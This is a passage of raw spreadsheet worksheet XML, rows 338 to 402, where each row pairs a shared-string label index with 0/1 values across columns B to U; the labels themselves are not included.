        <v>0</v>
      </c>
    </row>
    <row r="338" spans="1:21">
      <c r="A338" s="3" t="s">
        <v>337</v>
      </c>
      <c r="B338" s="1">
        <v>1</v>
      </c>
      <c r="C338" s="1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1</v>
      </c>
      <c r="I338" s="5">
        <v>0</v>
      </c>
      <c r="J338" s="5">
        <v>0</v>
      </c>
      <c r="K338" s="5">
        <v>0</v>
      </c>
      <c r="L338" s="5">
        <v>0</v>
      </c>
      <c r="M338" s="1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7">
        <v>0</v>
      </c>
      <c r="U338" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="339" spans="1:21" ht="45">
      <c r="A339" s="3" t="s">
        <v>338</v>
      </c>
      <c r="B339" s="1">
        <v>0</v>
      </c>
      <c r="C339" s="14">
        <v>0</v>
      </c>
      <c r="D339" s="5">
        <v>0</v>
      </c>
      <c r="E339" s="5">
        <v>1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1"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7">
        <v>0</v>
      </c>
      <c r="U339" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="340" spans="1:21">
      <c r="A340" s="3" t="s">
        <v>339</v>
      </c>
      <c r="B340" s="1">
        <v>0</v>
      </c>
      <c r="C340" s="14">
        <v>0</v>
      </c>
      <c r="D340" s="5">
        <v>0</v>
      </c>
      <c r="E340" s="5">
        <v>1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1</v>
      </c>
      <c r="M340" s="1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7">
        <v>0</v>
      </c>
      <c r="U340" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="341" spans="1:21" ht="45">
      <c r="A341" s="3" t="s">
        <v>340</v>
      </c>
      <c r="B341" s="1">
        <v>1</v>
      </c>
      <c r="C341" s="14">
        <v>1</v>
      </c>
      <c r="D341" s="5">
        <v>0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0</v>
      </c>
      <c r="K341" s="5">
        <v>0</v>
      </c>
      <c r="L341" s="5">
        <v>0</v>
      </c>
      <c r="M341" s="1"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1</v>
      </c>
      <c r="T341" s="7">
        <v>0</v>
      </c>
      <c r="U341" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="342" spans="1:21">
      <c r="A342" s="3" t="s">
        <v>341</v>
      </c>
      <c r="B342" s="1">
        <v>0</v>
      </c>
      <c r="C342" s="1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1</v>
      </c>
      <c r="M342" s="1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7">
        <v>0</v>
      </c>
      <c r="U342" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="343" spans="1:21" ht="30">
      <c r="A343" s="3" t="s">
        <v>342</v>
      </c>
      <c r="B343" s="1">
        <v>1</v>
      </c>
      <c r="C343" s="1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1">
        <v>0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0</v>
      </c>
      <c r="T343" s="7">
        <v>1</v>
      </c>
      <c r="U343" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="344" spans="1:21" ht="30">
      <c r="A344" s="3" t="s">
        <v>343</v>
      </c>
      <c r="B344" s="1">
        <v>1</v>
      </c>
      <c r="C344" s="1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1</v>
      </c>
      <c r="I344" s="5">
        <v>0</v>
      </c>
      <c r="J344" s="5">
        <v>0</v>
      </c>
      <c r="K344" s="5">
        <v>0</v>
      </c>
      <c r="L344" s="5">
        <v>0</v>
      </c>
      <c r="M344" s="1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7">
        <v>0</v>
      </c>
      <c r="U344" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="345" spans="1:21">
      <c r="A345" s="3" t="s">
        <v>344</v>
      </c>
      <c r="B345" s="1">
        <v>0</v>
      </c>
      <c r="C345" s="14">
        <v>0</v>
      </c>
      <c r="D345" s="5">
        <v>0</v>
      </c>
      <c r="E345" s="5">
        <v>0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>
        <v>0</v>
      </c>
      <c r="M345" s="1">
        <v>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7">
        <v>0</v>
      </c>
      <c r="U345" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="346" spans="1:21">
      <c r="A346" s="3" t="s">
        <v>345</v>
      </c>
      <c r="B346" s="1">
        <v>1</v>
      </c>
      <c r="C346" s="1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1</v>
      </c>
      <c r="I346" s="5">
        <v>0</v>
      </c>
      <c r="J346" s="5">
        <v>0</v>
      </c>
      <c r="K346" s="5">
        <v>0</v>
      </c>
      <c r="L346" s="5">
        <v>0</v>
      </c>
      <c r="M346" s="1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7">
        <v>0</v>
      </c>
      <c r="U346" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="347" spans="1:21">
      <c r="A347" s="3" t="s">
        <v>346</v>
      </c>
      <c r="B347" s="1">
        <v>1</v>
      </c>
      <c r="C347" s="14">
        <v>0</v>
      </c>
      <c r="D347" s="5">
        <v>0</v>
      </c>
      <c r="E347" s="5">
        <v>0</v>
      </c>
      <c r="F347" s="5">
        <v>1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0</v>
      </c>
      <c r="M347" s="1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7">
        <v>0</v>
      </c>
      <c r="U347" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="348" spans="1:21" ht="30">
      <c r="A348" s="3" t="s">
        <v>347</v>
      </c>
      <c r="B348" s="1">
        <v>1</v>
      </c>
      <c r="C348" s="14">
        <v>0</v>
      </c>
      <c r="D348" s="5">
        <v>0</v>
      </c>
      <c r="E348" s="5">
        <v>0</v>
      </c>
      <c r="F348" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U348" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="349" spans="1:21" ht="45">
      <c r="A349" s="3" t="s">
        <v>348</v>
      </c>
      <c r="B349" s="1">
        <v>1</v>
      </c>
      <c r="C349" s="14">
        <v>1</v>
      </c>
      <c r="D349" s="5">
        <v>0</v>
      </c>
      <c r="E349" s="5">
        <v>0</v>
      </c>
      <c r="F349" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N349" s="14">
        <v>0</v>
      </c>
      <c r="O349" s="14">
        <v>0</v>
      </c>
      <c r="P349" s="14">
        <v>0</v>
      </c>
      <c r="Q349" s="14">
        <v>1</v>
      </c>
      <c r="R349" s="14">
        <v>0</v>
      </c>
      <c r="S349" s="14">
        <v>0</v>
      </c>
      <c r="T349" s="7">
        <v>0</v>
      </c>
      <c r="U349" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="350" spans="1:21">
      <c r="A350" s="3" t="s">
        <v>349</v>
      </c>
      <c r="B350" s="1">
        <v>0</v>
      </c>
      <c r="C350" s="14">
        <v>0</v>
      </c>
      <c r="D350" s="5">
        <v>0</v>
      </c>
      <c r="E350" s="5">
        <v>1</v>
      </c>
      <c r="F350" s="5">
        <v>1</v>
      </c>
      <c r="G350" s="5">
        <v>0</v>
      </c>
      <c r="H350" s="5">
        <v>0</v>
      </c>
      <c r="I350" s="5">
        <v>1</v>
      </c>
      <c r="J350" s="5">
        <v>0</v>
      </c>
      <c r="K350" s="5">
        <v>0</v>
      </c>
      <c r="L350" s="5">
        <v>0</v>
      </c>
      <c r="M350" s="1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7">
        <v>0</v>
      </c>
      <c r="U350" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="351" spans="1:21">
      <c r="A351" s="3" t="s">
        <v>350</v>
      </c>
      <c r="B351" s="1">
        <v>1</v>
      </c>
      <c r="C351" s="14">
        <v>0</v>
      </c>
      <c r="D351" s="5">
        <v>0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>
        <v>0</v>
      </c>
      <c r="K351" s="5">
        <v>0</v>
      </c>
      <c r="L351" s="5">
        <v>0</v>
      </c>
      <c r="M351" s="1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7">
        <v>0</v>
      </c>
      <c r="U351" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="352" spans="1:21" ht="30">
      <c r="A352" s="3" t="s">
        <v>351</v>
      </c>
      <c r="B352" s="1">
        <v>0</v>
      </c>
      <c r="C352" s="14">
        <v>1</v>
      </c>
      <c r="D352" s="5">
        <v>0</v>
      </c>
      <c r="E352" s="5">
        <v>1</v>
      </c>
      <c r="F352" s="5">
        <v>1</v>
      </c>
      <c r="G352" s="5">
        <v>0</v>
      </c>
      <c r="H352" s="5">
        <v>0</v>
      </c>
      <c r="I352" s="5">
        <v>1</v>
      </c>
      <c r="J352" s="5">
        <v>0</v>
      </c>
      <c r="K352" s="5">
        <v>0</v>
      </c>
      <c r="L352" s="5">
        <v>0</v>
      </c>
      <c r="M352" s="1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U352" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="353" spans="1:21">
      <c r="A353" s="3" t="s">
        <v>352</v>
      </c>
      <c r="B353" s="1">
        <v>0</v>
      </c>
      <c r="C353" s="1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1</v>
      </c>
      <c r="M353" s="1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7">
        <v>0</v>
      </c>
      <c r="U353" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="354" spans="1:21">
      <c r="A354" s="3" t="s">
        <v>353</v>
      </c>
      <c r="B354" s="1">
        <v>0</v>
      </c>
      <c r="C354" s="14">
        <v>0</v>
      </c>
      <c r="D354" s="5">
        <v>0</v>
      </c>
      <c r="E354" s="5">
        <v>0</v>
      </c>
      <c r="F354" s="5">
        <v>1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U354" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="355" spans="1:21" ht="30">
      <c r="A355" s="3" t="s">
        <v>354</v>
      </c>
      <c r="B355" s="1">
        <v>0</v>
      </c>
      <c r="C355" s="14">
        <v>0</v>
      </c>
      <c r="D355" s="5">
        <v>0</v>
      </c>
      <c r="E355" s="5">
        <v>0</v>
      </c>
      <c r="F355" s="5">
        <v>1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0</v>
      </c>
      <c r="M355" s="1"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7">
        <v>0</v>
      </c>
      <c r="U355" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="356" spans="1:21">
      <c r="A356" s="3" t="s">
        <v>355</v>
      </c>
      <c r="B356" s="1">
        <v>1</v>
      </c>
      <c r="C356" s="14">
        <v>1</v>
      </c>
      <c r="D356" s="5">
        <v>0</v>
      </c>
      <c r="E356" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N356" s="14">
        <v>0</v>
      </c>
      <c r="O356" s="14">
        <v>0</v>
      </c>
      <c r="P356" s="14">
        <v>1</v>
      </c>
      <c r="Q356" s="14">
        <v>0</v>
      </c>
      <c r="R356" s="14">
        <v>0</v>
      </c>
      <c r="S356" s="14">
        <v>0</v>
      </c>
      <c r="T356" s="7">
        <v>0</v>
      </c>
      <c r="U356" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="357" spans="1:21" ht="30">
      <c r="A357" s="3" t="s">
        <v>356</v>
      </c>
      <c r="B357" s="1">
        <v>1</v>
      </c>
      <c r="C357" s="14">
        <v>1</v>
      </c>
      <c r="D357" s="5">
        <v>0</v>
      </c>
      <c r="E357" s="5">
        <v>0</v>
      </c>
      <c r="F357" s="5">
        <v>0</v>
      </c>
      <c r="G357" s="5">
        <v>0</v>
      </c>
      <c r="H357" s="5">
        <v>1</v>
      </c>
      <c r="I357" s="5">
        <v>0</v>
      </c>
      <c r="J357" s="5">
        <v>0</v>
      </c>
      <c r="K357" s="5">
        <v>0</v>
      </c>
      <c r="L357" s="5">
        <v>0</v>
      </c>
      <c r="M357" s="1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7">
        <v>0</v>
      </c>
      <c r="U357" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="358" spans="1:21" ht="30">
      <c r="A358" s="3" t="s">
        <v>357</v>
      </c>
      <c r="B358" s="1">
        <v>0</v>
      </c>
      <c r="C358" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U358" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="359" spans="1:21" ht="30">
      <c r="A359" s="3" t="s">
        <v>358</v>
      </c>
      <c r="B359" s="1">
        <v>1</v>
      </c>
      <c r="C359" s="1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1</v>
      </c>
      <c r="I359" s="5">
        <v>0</v>
      </c>
      <c r="J359" s="5">
        <v>0</v>
      </c>
      <c r="K359" s="5">
        <v>0</v>
      </c>
      <c r="L359" s="5">
        <v>0</v>
      </c>
      <c r="M359" s="1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7">
        <v>0</v>
      </c>
      <c r="U359" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="360" spans="1:21" ht="30">
      <c r="A360" s="3" t="s">
        <v>359</v>
      </c>
      <c r="B360" s="1">
        <v>1</v>
      </c>
      <c r="C360" s="14">
        <v>0</v>
      </c>
      <c r="D360" s="5">
        <v>0</v>
      </c>
      <c r="E360" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U360" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="361" spans="1:21">
      <c r="A361" s="3" t="s">
        <v>360</v>
      </c>
      <c r="B361" s="1">
        <v>1</v>
      </c>
      <c r="C361" s="1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0</v>
      </c>
      <c r="M361" s="1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7">
        <v>0</v>
      </c>
      <c r="U361" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="362" spans="1:21" ht="30">
      <c r="A362" s="3" t="s">
        <v>361</v>
      </c>
      <c r="B362" s="1">
        <v>1</v>
      </c>
      <c r="C362" s="14">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U362" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="363" spans="1:21" ht="30">
      <c r="A363" s="3" t="s">
        <v>362</v>
      </c>
      <c r="B363" s="1">
        <v>0</v>
      </c>
      <c r="C363" s="14">
        <v>0</v>
      </c>
      <c r="D363" s="5">
        <v>0</v>
      </c>
      <c r="E363" s="5">
        <v>0</v>
      </c>
      <c r="F363" s="5">
        <v>1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U363" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="364" spans="1:21" ht="30">
      <c r="A364" s="3" t="s">
        <v>363</v>
      </c>
      <c r="B364" s="1">
        <v>1</v>
      </c>
      <c r="C364" s="14">
        <v>0</v>
      </c>
      <c r="D364" s="5">
        <v>0</v>
      </c>
      <c r="E364" s="5">
        <v>0</v>
      </c>
      <c r="F364" s="5">
        <v>1</v>
      </c>
      <c r="G364" s="5">
        <v>0</v>
      </c>
      <c r="H364" s="5">
        <v>1</v>
      </c>
      <c r="I364" s="5">
        <v>0</v>
      </c>
      <c r="J364" s="5">
        <v>0</v>
      </c>
      <c r="K364" s="5">
        <v>0</v>
      </c>
      <c r="L364" s="5">
        <v>0</v>
      </c>
      <c r="M364" s="1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7">
        <v>1</v>
      </c>
      <c r="U364" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="365" spans="1:21" ht="90">
      <c r="A365" s="3" t="s">
        <v>364</v>
      </c>
      <c r="B365" s="1">
        <v>0</v>
      </c>
      <c r="C365" s="1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1</v>
      </c>
      <c r="M365" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U365" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="366" spans="1:21" ht="90">
      <c r="A366" s="3" t="s">
        <v>365</v>
      </c>
      <c r="B366" s="1">
        <v>0</v>
      </c>
      <c r="C366" s="1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1</v>
      </c>
      <c r="M366" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U366" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="367" spans="1:21">
      <c r="A367" s="3" t="s">
        <v>366</v>
      </c>
      <c r="B367" s="1">
        <v>1</v>
      </c>
      <c r="C367" s="1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U367" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="368" spans="1:21" ht="30">
      <c r="A368" s="3" t="s">
        <v>367</v>
      </c>
      <c r="B368" s="1">
        <v>1</v>
      </c>
      <c r="C368" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U368" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="369" spans="1:21">
      <c r="A369" s="3" t="s">
        <v>368</v>
      </c>
      <c r="B369" s="1">
        <v>1</v>
      </c>
      <c r="C369" s="1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5">
        <v>0</v>
      </c>
      <c r="M369" s="1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U369" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="370" spans="1:21" ht="30">
      <c r="A370" s="3" t="s">
        <v>369</v>
      </c>
      <c r="B370" s="1">
        <v>1</v>
      </c>
      <c r="C370" s="14">
        <v>0</v>
      </c>
      <c r="D370" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U370" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="371" spans="1:21" ht="24">
      <c r="A371" s="11" t="s">
        <v>370</v>
      </c>
      <c r="B371" s="1">
        <v>1</v>
      </c>
      <c r="C371" s="14">
        <v>1</v>
      </c>
      <c r="D371" s="5">
        <v>0</v>
      </c>
      <c r="E371" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N371" s="14">
        <v>0</v>
      </c>
      <c r="O371" s="14">
        <v>0</v>
      </c>
      <c r="P371" s="14">
        <v>0</v>
      </c>
      <c r="Q371" s="14">
        <v>0</v>
      </c>
      <c r="R371" s="14">
        <v>1</v>
      </c>
      <c r="S371" s="14">
        <v>0</v>
      </c>
      <c r="T371" s="7">
        <v>0</v>
      </c>
      <c r="U371" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="372" spans="1:21" ht="45">
      <c r="A372" s="3" t="s">
        <v>371</v>
      </c>
      <c r="B372" s="1">
        <v>1</v>
      </c>
      <c r="C372" s="14">
        <v>0</v>
      </c>
      <c r="D372" s="5">
        <v>0</v>
      </c>
      <c r="E372" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U372" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="373" spans="1:21" ht="45">
      <c r="A373" s="3" t="s">
        <v>372</v>
      </c>
      <c r="B373" s="1">
        <v>1</v>
      </c>
      <c r="C373" s="14">
        <v>0</v>
      </c>
      <c r="D373" s="5">
        <v>0</v>
      </c>
      <c r="E373" s="5">
        <v>0</v>
      </c>
      <c r="F373" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U373" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="374" spans="1:21" ht="45">
      <c r="A374" s="3" t="s">
        <v>373</v>
      </c>
      <c r="B374" s="1">
        <v>1</v>
      </c>
      <c r="C374" s="14">
        <v>1</v>
      </c>
      <c r="D374" s="5">
        <v>0</v>
      </c>
      <c r="E374" s="5">
        <v>1</v>
      </c>
      <c r="F374" s="5">
        <v>0</v>
      </c>
      <c r="G374" s="5">
        <v>0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1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1</v>
      </c>
      <c r="T374" s="7">
        <v>0</v>
      </c>
      <c r="U374" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="375" spans="1:21" ht="45">
      <c r="A375" s="3" t="s">
        <v>374</v>
      </c>
      <c r="B375" s="1">
        <v>1</v>
      </c>
      <c r="C375" s="14">
        <v>0</v>
      </c>
      <c r="D375" s="5">
        <v>0</v>
      </c>
      <c r="E375" s="5">
        <v>1</v>
      </c>
      <c r="F375" s="5">
        <v>1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1">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U375" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="376" spans="1:21" ht="45">
      <c r="A376" s="3" t="s">
        <v>375</v>
      </c>
      <c r="B376" s="1">
        <v>1</v>
      </c>
      <c r="C376" s="14">
        <v>1</v>
      </c>
      <c r="D376" s="5">
        <v>0</v>
      </c>
      <c r="E376" s="5">
        <v>1</v>
      </c>
      <c r="F376" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N376" s="14">
        <v>0</v>
      </c>
      <c r="O376" s="14">
        <v>0</v>
      </c>
      <c r="P376" s="14">
        <v>0</v>
      </c>
      <c r="Q376" s="14">
        <v>1</v>
      </c>
      <c r="R376" s="14">
        <v>0</v>
      </c>
      <c r="S376" s="14">
        <v>0</v>
      </c>
      <c r="T376" s="7">
        <v>0</v>
      </c>
      <c r="U376" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="377" spans="1:21">
      <c r="A377" s="3" t="s">
        <v>376</v>
      </c>
      <c r="B377" s="1">
        <v>0</v>
      </c>
      <c r="C377" s="14">
        <v>0</v>
      </c>
      <c r="D377" s="5">
        <v>0</v>
      </c>
      <c r="E377" s="5">
        <v>0</v>
      </c>
      <c r="F377" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U377" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="378" spans="1:21" ht="30">
      <c r="A378" s="3" t="s">
        <v>377</v>
      </c>
      <c r="B378" s="1">
        <v>1</v>
      </c>
      <c r="C378" s="14">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U378" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="379" spans="1:21" ht="30">
      <c r="A379" s="3" t="s">
        <v>378</v>
      </c>
      <c r="B379" s="1">
        <v>1</v>
      </c>
      <c r="C379" s="1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U379" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="380" spans="1:21" ht="30">
      <c r="A380" s="3" t="s">
        <v>379</v>
      </c>
      <c r="B380" s="1">
        <v>1</v>
      </c>
      <c r="C380" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U380" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="381" spans="1:21" ht="45">
      <c r="A381" s="3" t="s">
        <v>380</v>
      </c>
      <c r="B381" s="1">
        <v>1</v>
      </c>
      <c r="C381" s="14">
        <v>0</v>
      </c>
      <c r="D381" s="5">
        <v>0</v>
      </c>
      <c r="E381" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U381" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="382" spans="1:21" ht="30">
      <c r="A382" s="3" t="s">
        <v>381</v>
      </c>
      <c r="B382" s="1">
        <v>1</v>
      </c>
      <c r="C382" s="14">
        <v>0</v>
      </c>
      <c r="D382" s="5">
        <v>0</v>
      </c>
      <c r="E382" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N382" s="14">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U382" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="383" spans="1:21" ht="30">
      <c r="A383" s="3" t="s">
        <v>382</v>
      </c>
      <c r="B383" s="1">
        <v>1</v>
      </c>
      <c r="C383" s="14">
        <v>0</v>
      </c>
      <c r="D383" s="5">
        <v>0</v>
      </c>
      <c r="E383" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U383" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="384" spans="1:21" ht="30">
      <c r="A384" s="3" t="s">
        <v>383</v>
      </c>
      <c r="B384" s="1">
        <v>1</v>
      </c>
      <c r="C384" s="14">
        <v>0</v>
      </c>
      <c r="D384" s="5">
        <v>0</v>
      </c>
      <c r="E384" s="5">
        <v>0</v>
      </c>
      <c r="F384" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U384" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="385" spans="1:21" ht="30">
      <c r="A385" s="3" t="s">
        <v>384</v>
      </c>
      <c r="B385" s="1">
        <v>1</v>
      </c>
      <c r="C385" s="14">
        <v>0</v>
      </c>
      <c r="D385" s="5">
        <v>0</v>
      </c>
      <c r="E385" s="5">
        <v>0</v>
      </c>
      <c r="F385" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U385" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="386" spans="1:21" ht="30">
      <c r="A386" s="3" t="s">
        <v>385</v>
      </c>
      <c r="B386" s="1">
        <v>1</v>
      </c>
      <c r="C386" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U386" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="387" spans="1:21">
      <c r="A387" s="3" t="s">
        <v>386</v>
      </c>
      <c r="B387" s="1">
        <v>1</v>
      </c>
      <c r="C387" s="14">
        <v>0</v>
      </c>
      <c r="D387" s="5">
        <v>0</v>
      </c>
      <c r="E387" s="5">
        <v>0</v>
      </c>
      <c r="F387" s="5">
        <v>1</v>
      </c>
      <c r="G387" s="5">
        <v>0</v>
      </c>
      <c r="H387" s="5">
        <v>1</v>
      </c>
      <c r="I387" s="5">
        <v>0</v>
      </c>
      <c r="J387" s="5">
        <v>0</v>
      </c>
      <c r="K387" s="5">
        <v>0</v>
      </c>
      <c r="L387" s="5">
        <v>0</v>
      </c>
      <c r="M387" s="1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7">
        <v>0</v>
      </c>
      <c r="U387" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="388" spans="1:21" ht="30">
      <c r="A388" s="3" t="s">
        <v>387</v>
      </c>
      <c r="B388" s="1">
        <v>1</v>
      </c>
      <c r="C388" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U388" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="389" spans="1:21" ht="30">
      <c r="A389" s="3" t="s">
        <v>388</v>
      </c>
      <c r="B389" s="1">
        <v>0</v>
      </c>
      <c r="C389" s="14">
        <v>0</v>
      </c>
      <c r="D389" s="5">
        <v>0</v>
      </c>
      <c r="E389" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U389" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="390" spans="1:21">
      <c r="A390" s="3" t="s">
        <v>389</v>
      </c>
      <c r="B390" s="1">
        <v>1</v>
      </c>
      <c r="C390" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U390" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="391" spans="1:21">
      <c r="A391" s="3" t="s">
        <v>390</v>
      </c>
      <c r="B391" s="1">
        <v>1</v>
      </c>
      <c r="C391" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U391" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="392" spans="1:21">
      <c r="A392" s="3" t="s">
        <v>391</v>
      </c>
      <c r="B392" s="1">
        <v>1</v>
      </c>
      <c r="C392" s="14">
        <v>0</v>
      </c>
      <c r="D392" s="5">
        <v>0</v>
      </c>
      <c r="E392" s="5">
        <v>0</v>
      </c>
      <c r="F392" s="5">
        <v>1</v>
      </c>
      <c r="G392" s="5">
        <v>0</v>
      </c>
      <c r="H392" s="5">
        <v>0</v>
      </c>
      <c r="I392" s="5">
        <v>0</v>
      </c>
      <c r="J392" s="5">
        <v>1</v>
      </c>
      <c r="K392" s="5">
        <v>0</v>
      </c>
      <c r="L392" s="5">
        <v>0</v>
      </c>
      <c r="M392" s="1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7">
        <v>0</v>
      </c>
      <c r="U392" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="393" spans="1:21">
      <c r="A393" s="3" t="s">
        <v>392</v>
      </c>
      <c r="B393" s="1">
        <v>1</v>
      </c>
      <c r="C393" s="1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1</v>
      </c>
      <c r="I393" s="5">
        <v>0</v>
      </c>
      <c r="J393" s="5">
        <v>0</v>
      </c>
      <c r="K393" s="5">
        <v>0</v>
      </c>
      <c r="L393" s="5">
        <v>0</v>
      </c>
      <c r="M393" s="1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7">
        <v>0</v>
      </c>
      <c r="U393" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="394" spans="1:21" ht="30">
      <c r="A394" s="3" t="s">
        <v>393</v>
      </c>
      <c r="B394" s="1">
        <v>0</v>
      </c>
      <c r="C394" s="14">
        <v>0</v>
      </c>
      <c r="D394" s="5">
        <v>0</v>
      </c>
      <c r="E394" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U394" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="395" spans="1:21" ht="30">
      <c r="A395" s="3" t="s">
        <v>394</v>
      </c>
      <c r="B395" s="1">
        <v>1</v>
      </c>
      <c r="C395" s="14">
        <v>0</v>
      </c>
      <c r="D395" s="5">
        <v>0</v>
      </c>
      <c r="E395" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U395" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="396" spans="1:21" ht="30">
      <c r="A396" s="3" t="s">
        <v>395</v>
      </c>
      <c r="B396" s="1">
        <v>1</v>
      </c>
      <c r="C396" s="14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1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7">
        <v>1</v>
      </c>
      <c r="U396" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="397" spans="1:21">
      <c r="A397" s="3" t="s">
        <v>396</v>
      </c>
      <c r="B397" s="1">
        <v>1</v>
      </c>
      <c r="C397" s="14">
        <v>0</v>
      </c>
      <c r="D397" s="5">
        <v>0</v>
      </c>
      <c r="E397" s="5">
        <v>0</v>
      </c>
      <c r="F397" s="5">
        <v>1</v>
      </c>
      <c r="G397" s="5">
        <v>0</v>
      </c>
      <c r="H397" s="5">
        <v>1</v>
      </c>
      <c r="I397" s="5">
        <v>0</v>
      </c>
      <c r="J397" s="5">
        <v>0</v>
      </c>
      <c r="K397" s="5">
        <v>0</v>
      </c>
      <c r="L397" s="5">
        <v>0</v>
      </c>
      <c r="M397" s="1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7">
        <v>0</v>
      </c>
      <c r="U397" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="398" spans="1:21" ht="30">
      <c r="A398" s="3" t="s">
        <v>397</v>
      </c>
      <c r="B398" s="1">
        <v>1</v>
      </c>
      <c r="C398" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U398" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="399" spans="1:21" ht="30">
      <c r="A399" s="3" t="s">
        <v>398</v>
      </c>
      <c r="B399" s="1">
        <v>1</v>
      </c>
      <c r="C399" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U399" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="400" spans="1:21">
      <c r="A400" s="3" t="s">
        <v>399</v>
      </c>
      <c r="B400" s="1">
        <v>0</v>
      </c>
      <c r="C400" s="14">
        <v>0</v>
      </c>
      <c r="D400" s="5">
        <v>0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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U400" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="401" spans="1:21">
      <c r="A401" s="3" t="s">
        <v>400</v>
      </c>
      <c r="B401" s="1">
        <v>1</v>
      </c>
      <c r="C401" s="1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U401" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="402" spans="1:21" ht="30">
      <c r="A402" s="3" t="s">
        <v>401</v>
      </c>
      <c r="B402" s="1">
        <v>0</v>
      </c>
      <c r="C402" s="14">
        <v>0</v>
      </c>
      <c r="D402" s="5">
        <v>0</v>
      </c>
